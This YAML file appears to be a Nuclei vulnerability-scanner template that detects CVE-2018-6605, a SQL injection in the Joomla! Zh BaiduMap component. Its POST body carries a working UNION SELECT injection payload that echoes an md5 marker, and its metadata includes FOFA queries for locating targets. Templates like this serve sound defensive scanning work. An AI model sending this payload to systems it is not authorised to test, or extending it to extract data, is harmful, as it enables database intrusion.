53 lines
2.0 KiB
YAML
53 lines
2.0 KiB
YAML
id: CVE-2018-6605
|
|
|
|
info:
|
|
name: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
|
|
author: DhiyaneshDk
|
|
severity: critical
|
|
description: |
|
|
SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
|
|
reference:
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/C0reL0ader/EaST/blob/master/exploits/efa_joomla_zh_baidumap_sqli.py
|
|
- https://www.exploit-db.com/exploits/43974
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-6605
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00282
|
|
epss-percentile: 0.67968
|
|
cpe: cpe:2.3:a:zh_baidumap_project:zh_baidumap:3.0.0.1:*:*:*:*:joomla\!:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zh_baidumap_project
|
|
product: zh_baidumap
|
|
framework: joomla\!
|
|
fofa-query:
|
|
- app="Joomla!-网站安装"
|
|
- app="joomla!-网站安装"
|
|
tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project
|
|
variables:
|
|
num: "{{rand_int(2000000000, 2100000000)}}"
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: "id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "{{md5(num)}}"
|
|
- "dataexists"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100c4600dbe01c8f7f7cb92b9c3dda61c1b9ef8d68675e2ca7d7e3696eca6090270022075b93d0557782b56c9d2522d377eb3b2fa73067a7024393997f19dad3e012dac:922c64590222798bb761d5b6d8e72950 |